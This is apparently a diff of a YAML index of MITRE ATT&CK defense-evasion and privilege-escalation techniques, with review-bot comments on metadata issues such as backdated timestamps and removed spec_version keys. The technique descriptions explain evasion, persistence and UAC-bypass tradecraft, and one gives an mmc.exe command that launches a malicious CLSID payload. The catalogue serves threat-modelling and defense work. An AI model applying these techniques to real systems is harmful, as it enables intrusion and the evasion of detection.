Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14071,11 +14354,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14142,8 +14424,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14161,7 +14443,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14264,12 +14545,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14282,6 +14562,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14318,17 +14599,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -14374,9 +14655,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -14414,7 +14692,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14433,7 +14711,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14464,7 +14741,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14488,12 +14765,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14577,7 +14852,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14599,7 +14873,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14633,12 +14907,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14690,9 +14962,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -14761,7 +15032,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -14808,7 +15078,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -14821,12 +15091,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
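Review bot: `T1127` gains two data sources, `Module: Module Load` and `Process: Process Metadata`, while the preceding hunk moves its `modified` stamp backwards from `2022-05-24T14:00:00.188Z` to `2022-05-05T05:00:37.443Z` and `x_mitre_attack_spec_version` stays at `2.1.0`. New content arriving under an older timestamp is inconsistent with the rest of this diff, where the older stamps accompany unchanged content, so verify which copy of this object is the authoritative one before merging rather than assuming the newly read bundle is strictly older.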
@@ -14905,7 +15176,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14927,7 +15198,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -14970,7 +15240,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -14994,8 +15264,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -15043,7 +15311,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15081,8 +15349,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15131,7 +15397,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15183,29 +15449,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15252,7 +15517,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15284,8 +15549,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15299,6 +15564,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -15311,11 +15580,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
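Review bot: `spec_version: '2.1'` is removed here and from every other technique object in this diff with nothing put in its place, so the objects stop declaring themselves as STIX 2.1; `spec_version` is a required property on STIX 2.1 domain objects, and any consumer that validates these entries against a STIX 2.1 schema will start rejecting them. If the upstream generator now omits it deliberately, say so in the commit message and confirm nothing in the index build keys off it. The added `Stack Overflow` reference is fine as a source but, like the Red Canary entry above it, needs a `(Citation: Stack Overflow)` anchor in the description to be reachable.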
@@ -15381,7 +15653,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15470,7 +15741,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15558,7 +15828,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15643,7 +15912,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15675,7 +15943,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
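Review bot: the `modified` timestamp for LC_LOAD_DYLIB Addition moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-20T17:08:21.101Z`, and the same regression appears further down for T1548.002, T1548.003, T1547.014, T1055.003, T1546.011, T1037.002 and T1055. The old values all share the `14:00:00.188Z` suffix, so they look like release-level stamps being replaced by the per-object upstream value, which is reasonable; but anything that syncs on `modified` greater than last-seen will treat these objects as unchanged. State the provenance switch in the commit message and, if a downstream sync depends on monotonic timestamps, have it compare by content hash instead.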
@@ -15698,11 +15966,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15760,14 +16027,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15868,7 +16134,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -15899,7 +16164,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -15933,13 +16198,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
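Review bot: T1548.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk and nothing is added back, whereas T1574.011 has its `x_mitre_attack_spec_version: 3.2.0` re-added at the end of the object in a later hunk. Unless the attack spec version is restored for T1548.003 outside the visible context, the object ends up with no spec version at all; the same pattern applies to T1055.003 and T1546.011 below. Check those three objects in the regenerated file and either restore the key or confirm the upstream object genuinely carries none.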
@@ -15958,7 +16221,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -15972,7 +16234,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -15999,8 +16260,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16031,12 +16292,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16108,9 +16370,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16126,12 +16388,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16206,12 +16467,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16231,9 +16491,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
